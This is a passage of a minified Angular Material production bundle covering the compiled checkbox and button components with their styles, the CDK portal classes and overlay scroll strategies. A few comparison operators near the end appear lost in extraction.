0:e.clickAction;this.disabled||"noop"===i?!this.disabled&&"noop"===i&&(this._inputElement.nativeElement.checked=this.checked,this._inputElement.nativeElement.indeterminate=this.indeterminate):(this.indeterminate&&"check"!==i&&Promise.resolve().then(()=>{this._indeterminate=!1,this.indeterminateChange.emit(this._indeterminate)}),this._checked=!this._checked,this._transitionCheckState(this._checked?1:2),this._emitChangeEvent())}_onInteractionEvent(e){e.stopPropagation()}_onBlur(){Promise.resolve().then(()=>{this._onTouched(),this._changeDetectorRef.markForCheck()})}_getAnimationClassForCheckStateTransition(e,i){if("NoopAnimations"===this._animationMode)return"";switch(e){case 0:if(1===i)return this._animationClasses.uncheckedToChecked;if(3==i)return this._checked?this._animationClasses.checkedToIndeterminate:this._animationClasses.uncheckedToIndeterminate;break;case 2:return 1===i?this._animationClasses.uncheckedToChecked:this._animationClasses.uncheckedToIndeterminate;case 1:return 2===i?this._animationClasses.checkedToUnchecked:this._animationClasses.checkedToIndeterminate;case 3:return 1===i?this._animationClasses.indeterminateToChecked:this._animationClasses.indeterminateToUnchecked}return""}_syncIndeterminate(e){const i=this._inputElement;i&&(i.nativeElement.indeterminate=e)}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(p_e,5),Mi(__e,5),Mi(Dl,5)),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first),Vt(n=Bt())&&(i._labelElement=n.first),Vt(n=Bt())&&(i.ripple=n.first)}},inputs:{ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],id:"id",required:"required",labelPosition:"labelPosition",name:"name",value:"value",checked:"checked",disabled:"disabled",indeterminate:"indeterminate"},outputs:{change:"change",indeterminateChange:"indeterminateChange"},features:[ci]}),t})(),br=(()=>{class t extends T_e{constructor(e,i,n,r,c,d,T){super("mat-checkbox-",e,i,r,c,d,T),this._focusMonitor=n,this._animationClasses={uncheckedToChecked:"mat-checkbox-anim-unchecked-checked",uncheckedToIndeterminate:"mat-checkbox-anim-unchecked-indeterminate",checkedToUnchecked:"mat-checkbox-anim-checked-unchecked",checkedToIndeterminate:"mat-checkbox-anim-checked-indeterminate",indeterminateToChecked:"mat-checkbox-anim-indeterminate-checked",indeterminateToUnchecked:"mat-checkbox-anim-indeterminate-unchecked"}}_createChangeEvent(e){const i=new v_e;return i.source=this,i.checked=e,i}_getAnimationTargetElement(){return this._elementRef.nativeElement}ngAfterViewInit(){super.ngAfterViewInit(),this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{e||this._onBlur()})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}_onInputClick(e){e.stopPropagation(),super._handleInputClick()}focus(e,i){e?this._focusMonitor.focusVia(this._inputElement,e,i):this._inputElement.nativeElement.focus(i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(js),Ee(qi),Vr("tabindex"),Ee(ar,8),Ee(y_e,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-checkbox"]],hostAttrs:[1,"mat-checkbox"],hostVars:14,hostBindings:function(e,i){2&e&&(Gs("id",i.id),Rt("tabindex",null)("aria-label",null)("aria-labelledby",null),Ct("mat-checkbox-indeterminate",i.indeterminate)("mat-checkbox-checked",i.checked)("mat-checkbox-disabled",i.disabled)("mat-checkbox-label-before","before"==i.labelPosition)("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{disableRipple:"disableRipple",color:"color",tabIndex:"tabIndex"},exportAs:["matCheckbox"],features:[ki([M_e]),ci],ngContentSelectors:C_e,decls:17,vars:21,consts:[[1,"mat-checkbox-layout"],["label",""],[1,"mat-checkbox-inner-container"],["type","checkbox",1,"mat-checkbox-input","cdk-visually-hidden",3,"id","required","checked","disabled","tabIndex","change","click"],["input",""],["matRipple","",1,"mat-checkbox-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleRadius","matRippleCentered","matRippleAnimation"],[1,"mat-ripple-element","mat-checkbox-persistent-ripple"],[1,"mat-checkbox-frame"],[1,"mat-checkbox-background"],["version","1.1","focusable","false","viewBox","0 0 24 24","aria-hidden","true",1,"mat-checkbox-checkmark"],["fill","none","stroke","white","d","M4.1,12.7 9,17.6 20.3,6.3",1,"mat-checkbox-checkmark-path"],[1,"mat-checkbox-mixedmark"],[1,"mat-checkbox-label",3,"cdkObserveContent"],["checkboxLabel",""],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2)(3,"input",3,4),he("change",function(r){return i._onInteractionEvent(r)})("click",function(r){return i._onInputClick(r)}),u(),m(5,"span",5),it(6,"span",6),u(),it(7,"span",7),m(8,"span",8),fi(),m(9,"svg",9),it(10,"path",10),u(),ln(),it(11,"span",11),u()(),m(12,"span",12,13),he("cdkObserveContent",function(){return i._onLabelTextChange()}),m(14,"span",14),s(15,"\xa0"),u(),va(16),u()()),2&e){const n=Ti(1),r=Ti(13);Rt("for",i.inputId),g(2),Ct("mat-checkbox-inner-container-no-side-margin",!r.textContent||!r.textContent.trim()),g(1),F("id",i.inputId)("required",i.required)("checked",i.checked)("disabled",i.disabled)("tabIndex",i.tabIndex),Rt("value",i.value)("name",i.name)("aria-label",i.ariaLabel||null)("aria-labelledby",i.ariaLabelledby)("aria-checked",i._getAriaChecked())("aria-describedby",i.ariaDescribedby),g(2),F("matRippleTrigger",n)("matRippleDisabled",i._isRippleDisabled())("matRippleRadius",20)("matRippleCentered",!0)("matRippleAnimation",fr(19,g_e,"NoopAnimations"===i._animationMode?0:150))}},dependencies:[Dl,P3],styles:['@keyframes mat-checkbox-fade-in-background{0%{opacity:0}50%{opacity:1}}@keyframes mat-checkbox-fade-out-background{0%,50%{opacity:1}100%{opacity:0}}@keyframes mat-checkbox-unchecked-checked-checkmark-path{0%,50%{stroke-dashoffset:22.910259}50%{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1)}100%{stroke-dashoffset:0}}@keyframes mat-checkbox-unchecked-indeterminate-mixedmark{0%,68.2%{transform:scaleX(0)}68.2%{animation-timing-function:cubic-bezier(0, 0, 0, 1)}100%{transform:scaleX(1)}}@keyframes mat-checkbox-checked-unchecked-checkmark-path{from{animation-timing-function:cubic-bezier(0.4, 0, 1, 1);stroke-dashoffset:0}to{stroke-dashoffset:-22.910259}}@keyframes mat-checkbox-checked-indeterminate-checkmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1);opacity:1;transform:rotate(0deg)}to{opacity:0;transform:rotate(45deg)}}@keyframes mat-checkbox-indeterminate-checked-checkmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);opacity:0;transform:rotate(45deg)}to{opacity:1;transform:rotate(360deg)}}@keyframes mat-checkbox-checked-indeterminate-mixedmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1);opacity:0;transform:rotate(-45deg)}to{opacity:1;transform:rotate(0deg)}}@keyframes mat-checkbox-indeterminate-checked-mixedmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);opacity:1;transform:rotate(0deg)}to{opacity:0;transform:rotate(315deg)}}@keyframes mat-checkbox-indeterminate-unchecked-mixedmark{0%{animation-timing-function:linear;opacity:1;transform:scaleX(1)}32.8%,100%{opacity:0;transform:scaleX(0)}}.mat-checkbox-background,.mat-checkbox-frame{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:2px;box-sizing:border-box;pointer-events:none}.mat-checkbox{display:inline-block;transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);cursor:pointer;-webkit-tap-highlight-color:rgba(0,0,0,0);position:relative}.mat-checkbox._mat-animation-noopable{transition:none !important;animation:none !important}.mat-checkbox .mat-ripple-element:not(.mat-checkbox-persistent-ripple){opacity:.16}.mat-checkbox .mat-checkbox-ripple{position:absolute;left:calc(50% - 20px);top:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-checkbox-layout{-webkit-user-select:none;user-select:none;cursor:inherit;align-items:baseline;vertical-align:middle;display:inline-flex;white-space:nowrap}.mat-checkbox-label{-webkit-user-select:auto;user-select:auto}.mat-checkbox-inner-container{display:inline-block;height:16px;line-height:0;margin:auto;margin-right:8px;order:0;position:relative;vertical-align:middle;white-space:nowrap;width:16px;flex-shrink:0}[dir=rtl] .mat-checkbox-inner-container{margin-left:8px;margin-right:auto}.mat-checkbox-inner-container-no-side-margin{margin-left:0;margin-right:0}.mat-checkbox-frame{background-color:rgba(0,0,0,0);transition:border-color 90ms cubic-bezier(0, 0, 0.2, 0.1);border-width:2px;border-style:solid}._mat-animation-noopable .mat-checkbox-frame{transition:none}.mat-checkbox-background{align-items:center;display:inline-flex;justify-content:center;transition:background-color 90ms cubic-bezier(0, 0, 0.2, 0.1),opacity 90ms cubic-bezier(0, 0, 0.2, 0.1);-webkit-print-color-adjust:exact;color-adjust:exact}._mat-animation-noopable .mat-checkbox-background{transition:none}.cdk-high-contrast-active .mat-checkbox .mat-checkbox-background{background:none}.mat-checkbox-persistent-ripple{display:block;width:100%;height:100%;transform:none}.mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{opacity:.04}.mat-checkbox.cdk-keyboard-focused .mat-checkbox-persistent-ripple{opacity:.12}.mat-checkbox-persistent-ripple,.mat-checkbox.mat-checkbox-disabled .mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{opacity:0}@media(hover: none){.mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{display:none}}.mat-checkbox-checkmark{top:0;left:0;right:0;bottom:0;position:absolute;width:100%}.mat-checkbox-checkmark-path{stroke-dashoffset:22.910259;stroke-dasharray:22.910259;stroke-width:2.1333333333px}.cdk-high-contrast-black-on-white .mat-checkbox-checkmark-path{stroke:#000 !important}.mat-checkbox-mixedmark{width:calc(100% - 6px);height:2px;opacity:0;transform:scaleX(0) rotate(0deg);border-radius:2px}.cdk-high-contrast-active .mat-checkbox-mixedmark{height:0;border-top:solid 2px;margin-top:2px}.mat-checkbox-label-before .mat-checkbox-inner-container{order:1;margin-left:8px;margin-right:auto}[dir=rtl] .mat-checkbox-label-before .mat-checkbox-inner-container{margin-left:auto;margin-right:8px}.mat-checkbox-checked .mat-checkbox-checkmark{opacity:1}.mat-checkbox-checked .mat-checkbox-checkmark-path{stroke-dashoffset:0}.mat-checkbox-checked .mat-checkbox-mixedmark{transform:scaleX(1) rotate(-45deg)}.mat-checkbox-indeterminate .mat-checkbox-checkmark{opacity:0;transform:rotate(45deg)}.mat-checkbox-indeterminate .mat-checkbox-checkmark-path{stroke-dashoffset:0}.mat-checkbox-indeterminate .mat-checkbox-mixedmark{opacity:1;transform:scaleX(1) rotate(0deg)}.mat-checkbox-unchecked .mat-checkbox-background{background-color:rgba(0,0,0,0)}.mat-checkbox-disabled{cursor:default}.cdk-high-contrast-active .mat-checkbox-disabled{opacity:.5}.mat-checkbox-anim-unchecked-checked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-in-background}.mat-checkbox-anim-unchecked-checked .mat-checkbox-checkmark-path{animation:180ms linear 0ms mat-checkbox-unchecked-checked-checkmark-path}.mat-checkbox-anim-unchecked-indeterminate .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-in-background}.mat-checkbox-anim-unchecked-indeterminate .mat-checkbox-mixedmark{animation:90ms linear 0ms mat-checkbox-unchecked-indeterminate-mixedmark}.mat-checkbox-anim-checked-unchecked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-out-background}.mat-checkbox-anim-checked-unchecked .mat-checkbox-checkmark-path{animation:90ms linear 0ms mat-checkbox-checked-unchecked-checkmark-path}.mat-checkbox-anim-checked-indeterminate .mat-checkbox-checkmark{animation:90ms linear 0ms mat-checkbox-checked-indeterminate-checkmark}.mat-checkbox-anim-checked-indeterminate .mat-checkbox-mixedmark{animation:90ms linear 0ms mat-checkbox-checked-indeterminate-mixedmark}.mat-checkbox-anim-indeterminate-checked .mat-checkbox-checkmark{animation:500ms linear 0ms mat-checkbox-indeterminate-checked-checkmark}.mat-checkbox-anim-indeterminate-checked .mat-checkbox-mixedmark{animation:500ms linear 0ms mat-checkbox-indeterminate-checked-mixedmark}.mat-checkbox-anim-indeterminate-unchecked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-out-background}.mat-checkbox-anim-indeterminate-unchecked .mat-checkbox-mixedmark{animation:300ms linear 0ms mat-checkbox-indeterminate-unchecked-mixedmark}.mat-checkbox-input{bottom:0;left:50%}.mat-checkbox-input:focus~.mat-focus-indicator::before{content:""}'],encapsulation:2,changeDetection:0}),t})(),GW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),jW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,la,$y,GW,la,GW]}),t})();const x_e=["mat-button",""],w_e=["*"],R_e=["mat-button","mat-flat-button","mat-icon-button","mat-raised-button","mat-stroked-button","mat-mini-fab","mat-fab"],S_e=Pd(Zc(El(class{constructor(t){this._elementRef=t}})));let da=(()=>{class t extends S_e{constructor(e,i,n){super(e),this._focusMonitor=i,this._animationMode=n,this.isRoundButton=this._hasHostAttributes("mat-fab","mat-mini-fab"),this.isIconButton=this._hasHostAttributes("mat-icon-button");for(const r of R_e)this._hasHostAttributes(r)&&this._getHostElement().classList.add(r);e.nativeElement.classList.add("mat-button-base"),this.isRoundButton&&(this.color="accent")}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}focus(e,i){e?this._focusMonitor.focusVia(this._getHostElement(),e,i):this._getHostElement().focus(i)}_getHostElement(){return this._elementRef.nativeElement}_isRippleDisabled(){return this.disableRipple||this.disabled}_hasHostAttributes(...e){return e.some(i=>this._getHostElement().hasAttribute(i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["button","mat-button",""],["button","mat-raised-button",""],["button","mat-icon-button",""],["button","mat-fab",""],["button","mat-mini-fab",""],["button","mat-stroked-button",""],["button","mat-flat-button",""]],viewQuery:function(e,i){if(1&e&&Mi(Dl,5),2&e){let n;Vt(n=Bt())&&(i.ripple=n.first)}},hostAttrs:[1,"mat-focus-indicator"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("disabled",i.disabled||null),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)("mat-button-disabled",i.disabled))},inputs:{disabled:"disabled",disableRipple:"disableRipple",color:"color"},exportAs:["matButton"],features:[ci],attrs:x_e,ngContentSelectors:w_e,decls:4,vars:5,consts:[[1,"mat-button-wrapper"],["matRipple","",1,"mat-button-ripple",3,"matRippleDisabled","matRippleCentered","matRippleTrigger"],[1,"mat-button-focus-overlay"]],template:function(e,i){1&e&&(Jn(),m(0,"span",0),va(1),u(),it(2,"span",1)(3,"span",2)),2&e&&(g(2),Ct("mat-button-ripple-round",i.isRoundButton||i.isIconButton),F("matRippleDisabled",i._isRippleDisabled())("matRippleCentered",i.isIconButton)("matRippleTrigger",i._getHostElement()))},dependencies:[Dl],styles:[".mat-button .mat-button-focus-overlay,.mat-icon-button .mat-button-focus-overlay{opacity:0}.mat-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay,.mat-stroked-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay{opacity:.04}@media(hover: none){.mat-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay,.mat-stroked-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay{opacity:0}}.mat-button,.mat-icon-button,.mat-stroked-button,.mat-flat-button{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-button.mat-button-disabled,.mat-icon-button.mat-button-disabled,.mat-stroked-button.mat-button-disabled,.mat-flat-button.mat-button-disabled{cursor:default}.mat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-button.cdk-program-focused .mat-button-focus-overlay,.mat-icon-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-icon-button.cdk-program-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-program-focused .mat-button-focus-overlay,.mat-flat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-flat-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-raised-button{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1)}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button.mat-button-disabled{cursor:default}.mat-raised-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-raised-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button._mat-animation-noopable{transition:none !important;animation:none !important}.mat-stroked-button{border:1px solid currentColor;padding:0 15px;line-height:34px}.mat-stroked-button .mat-button-ripple.mat-ripple,.mat-stroked-button .mat-button-focus-overlay{top:-1px;left:-1px;right:-1px;bottom:-1px}.mat-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:56px;height:56px;padding:0;flex-shrink:0}.mat-fab::-moz-focus-inner{border:0}.mat-fab.mat-button-disabled{cursor:default}.mat-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-fab::-moz-focus-inner{border:0}.mat-fab._mat-animation-noopable{transition:none !important;animation:none !important}.mat-fab .mat-button-wrapper{padding:16px 0;display:inline-block;line-height:24px}.mat-mini-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:40px;height:40px;padding:0;flex-shrink:0}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab.mat-button-disabled{cursor:default}.mat-mini-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-mini-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab._mat-animation-noopable{transition:none !important;animation:none !important}.mat-mini-fab .mat-button-wrapper{padding:8px 0;display:inline-block;line-height:24px}.mat-icon-button{padding:0;min-width:0;width:40px;height:40px;flex-shrink:0;line-height:40px;border-radius:50%}.mat-icon-button i,.mat-icon-button .mat-icon{line-height:24px}.mat-button-ripple.mat-ripple,.mat-button-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit}.mat-button-ripple.mat-ripple:not(:empty){transform:translateZ(0)}.mat-button-focus-overlay{opacity:0;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1),background-color 200ms cubic-bezier(0.35, 0, 0.25, 1)}._mat-animation-noopable .mat-button-focus-overlay{transition:none}.mat-button-ripple-round{border-radius:50%;z-index:1}.mat-button .mat-button-wrapper>*,.mat-flat-button .mat-button-wrapper>*,.mat-stroked-button .mat-button-wrapper>*,.mat-raised-button .mat-button-wrapper>*,.mat-icon-button .mat-button-wrapper>*,.mat-fab .mat-button-wrapper>*,.mat-mini-fab .mat-button-wrapper>*{vertical-align:middle}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button{display:inline-flex;justify-content:center;align-items:center;font-size:inherit;width:2.5em;height:2.5em}.mat-flat-button::before,.mat-raised-button::before,.mat-fab::before,.mat-mini-fab::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-stroked-button::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 3px) * -1)}.cdk-high-contrast-active .mat-button,.cdk-high-contrast-active .mat-flat-button,.cdk-high-contrast-active .mat-raised-button,.cdk-high-contrast-active .mat-icon-button,.cdk-high-contrast-active .mat-fab,.cdk-high-contrast-active .mat-mini-fab{outline:solid 1px}"],encapsulation:2,changeDetection:0}),t})(),up=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,la,la]}),t})(),QW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();function $W(t,a){return a?e=>ug(a.pipe(Cn(1),function k_e(){return Ie((t,a)=>{t.subscribe(Ae(a,y))})}()),e.pipe($W(t))):Ut((e,i)=>t(e,i).pipe(Cn(1),H4(e)))}function Z3(t,a=Vy){const e=M3(t,a);return $W(()=>e)}class Jw{attach(a){return this._attachedHost=a,a.attach(this)}detach(){let a=this._attachedHost;null!=a&&(this._attachedHost=null,a.detach())}get isAttached(){return null!=this._attachedHost}setAttachedHost(a){this._attachedHost=a}}class hp extends Jw{constructor(a,e,i,n){super(),this.component=a,this.viewContainerRef=e,this.injector=i,this.componentFactoryResolver=n}}class Mm extends Jw{constructor(a,e,i,n){super(),this.templateRef=a,this.viewContainerRef=e,this.context=i,this.injector=n}get origin(){return this.templateRef.elementRef}attach(a,e=this.context){return this.context=e,super.attach(a)}detach(){return this.context=void 0,super.detach()}}class P_e extends Jw{constructor(a){super(),this.element=a instanceof mi?a.nativeElement:a}}class eA{constructor(){this._isDisposed=!1,this.attachDomPortal=null}hasAttached(){return!!this._attachedPortal}attach(a){return a instanceof hp?(this._attachedPortal=a,this.attachComponentPortal(a)):a instanceof Mm?(this._attachedPortal=a,this.attachTemplatePortal(a)):this.attachDomPortal&&a instanceof P_e?(this._attachedPortal=a,this.attachDomPortal(a)):void 0}detach(){this._attachedPortal&&(this._attachedPortal.setAttachedHost(null),this._attachedPortal=null),this._invokeDisposeFn()}dispose(){this.hasAttached()&&this.detach(),this._invokeDisposeFn(),this._isDisposed=!0}setDisposeFn(a){this._disposeFn=a}_invokeDisposeFn(){this._disposeFn&&(this._disposeFn(),this._disposeFn=null)}}class Zw extends eA{constructor(a,e,i,n,r){super(),this.outletElement=a,this._componentFactoryResolver=e,this._appRef=i,this._defaultInjector=n,this.attachDomPortal=c=>{const d=c.element,T=this._document.createComment("dom-portal");d.parentNode.insertBefore(T,d),this.outletElement.appendChild(d),this._attachedPortal=c,super.setDisposeFn(()=>{T.parentNode&&T.parentNode.replaceChild(d,T)})},this._document=r}attachComponentPortal(a){const i=(a.componentFactoryResolver||this._componentFactoryResolver).resolveComponentFactory(a.component);let n;return a.viewContainerRef?(n=a.viewContainerRef.createComponent(i,a.viewContainerRef.length,a.injector||a.viewContainerRef.injector),this.setDisposeFn(()=>n.destroy())):(n=i.create(a.injector||this._defaultInjector||Ko.NULL),this._appRef.attachView(n.hostView),this.setDisposeFn(()=>{this._appRef.viewCount>0&&this._appRef.detachView(n.hostView),n.destroy()})),this.outletElement.appendChild(this._getComponentRootNode(n)),this._attachedPortal=a,n}attachTemplatePortal(a){let e=a.viewContainerRef,i=e.createEmbeddedView(a.templateRef,a.context,{injector:a.injector});return i.rootNodes.forEach(n=>this.outletElement.appendChild(n)),i.detectChanges(),this.setDisposeFn(()=>{let n=e.indexOf(i);-1!==n&&e.remove(n)}),this._attachedPortal=a,i}dispose(){super.dispose(),this.outletElement.remove()}_getComponentRootNode(a){return a.hostView.rootNodes[0]}}let O_e=(()=>{class t extends Mm{constructor(e,i){super(e,i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","cdkPortal",""]],exportAs:["cdkPortal"],features:[ci]}),t})(),Cu=(()=>{class t extends eA{constructor(e,i,n){super(),this._componentFactoryResolver=e,this._viewContainerRef=i,this._isInitialized=!1,this.attached=new Tt,this.attachDomPortal=r=>{const c=r.element,d=this._document.createComment("dom-portal");r.setAttachedHost(this),c.parentNode.insertBefore(d,c),this._getRootNode().appendChild(c),this._attachedPortal=r,super.setDisposeFn(()=>{d.parentNode&&d.parentNode.replaceChild(c,d)})},this._document=n}get portal(){return this._attachedPortal}set portal(e){this.hasAttached()&&!e&&!this._isInitialized||(this.hasAttached()&&super.detach(),e&&super.attach(e),this._attachedPortal=e||null)}get attachedRef(){return this._attachedRef}ngOnInit(){this._isInitialized=!0}ngOnDestroy(){super.dispose(),this._attachedPortal=null,this._attachedRef=null}attachComponentPortal(e){e.setAttachedHost(this);const i=null!=e.viewContainerRef?e.viewContainerRef:this._viewContainerRef,r=(e.componentFactoryResolver||this._componentFactoryResolver).resolveComponentFactory(e.component),c=i.createComponent(r,i.length,e.injector||i.injector);return i!==this._viewContainerRef&&this._getRootNode().appendChild(c.hostView.rootNodes[0]),super.setDisposeFn(()=>c.destroy()),this._attachedPortal=e,this._attachedRef=c,this.attached.emit(c),c}attachTemplatePortal(e){e.setAttachedHost(this);const i=this._viewContainerRef.createEmbeddedView(e.templateRef,e.context,{injector:e.injector});return super.setDisposeFn(()=>this._viewContainerRef.clear()),this._attachedPortal=e,this._attachedRef=i,this.attached.emit(i),i}_getRootNode(){const e=this._viewContainerRef.element.nativeElement;return e.nodeType===e.ELEMENT_NODE?e:e.parentNode}}return t.\u0275fac=function(e){return new(e||t)(Ee(On),Ee(fo),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","cdkPortalOutlet",""]],inputs:{portal:["cdkPortalOutlet","portal"]},outputs:{attached:"attached"},exportAs:["cdkPortalOutlet"],features:[ci]}),t})(),yu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const KW=Mz();class N_e{constructor(a,e){this._viewportRuler=a,this._previousHTMLStyles={top:"",left:""},this._isEnabled=!1,this._document=e}attach(){}enable(){if(this._canBeEnabled()){const a=this._document.documentElement;this._previousScrollPosition=this._viewportRuler.getViewportScrollPosition(),this._previousHTMLStyles.left=a.style.left||"",this._previousHTMLStyles.top=a.style.top||"",a.style.left=vs(-this._previousScrollPosition.left),a.style.top=vs(-this._previousScrollPosition.top),a.classList.add("cdk-global-scrollblock"),this._isEnabled=!0}}disable(){if(this._isEnabled){const a=this._document.documentElement,i=a.style,n=this._document.body.style,r=i.scrollBehavior||"",c=n.scrollBehavior||"";this._isEnabled=!1,i.left=this._previousHTMLStyles.left,i.top=this._previousHTMLStyles.top,a.classList.remove("cdk-global-scrollblock"),KW&&(i.scrollBehavior=n.scrollBehavior="auto"),window.scroll(this._previousScrollPosition.left,this._previousScrollPosition.top),KW&&(i.scrollBehavior=r,n.scrollBehavior=c)}}_canBeEnabled(){if(this._document.documentElement.classList.contains("cdk-global-scrollblock")||this._isEnabled)return!1;const e=this._document.body,i=this._viewportRuler.getViewportSize();return e.scrollHeight>i.height||e.scrollWidth>i.width}}class L_e{constructor(a,e,i,n){this._scrollDispatcher=a,this._ngZone=e,this._viewportRuler=i,this._config=n,this._scrollSubscription=null,this._detach=()=>{this.disable(),this._overlayRef.hasAttached()&&this._ngZone.run(()=>this._overlayRef.detach())}}attach(a){this._overlayRef=a}enable(){if(this._scrollSubscription)return;const a=this._scrollDispatcher.scrolled(0);this._config&&this._config.threshold&&this._config.threshold>1?(this._initialScrollPosition=this._viewportRuler.getViewportScrollPosition().top,this._scrollSubscription=a.subscribe(()=>{const e=this._viewportRuler.getViewportScrollPosition().top;Math.abs(e-this._initialScrollPosition)>this._config.threshold?this._detach():this._overlayRef.updatePosition()})):this._scrollSubscription=a.subscribe(this._detach)}disable(){this._scrollSubscription&&(this._scrollSubscription.unsubscribe(),this._scrollSubscription=null)}detach(){this.disable(),this._overlayRef=null}}class XW{enable(){}disable(){}attach(){}}function e8(t,a){return a.some(e=>t.bottome.bottom||t.righte.right)}function YW(t,a){return a.some(e=>t.tope.bottom||t.lefte.right)}class 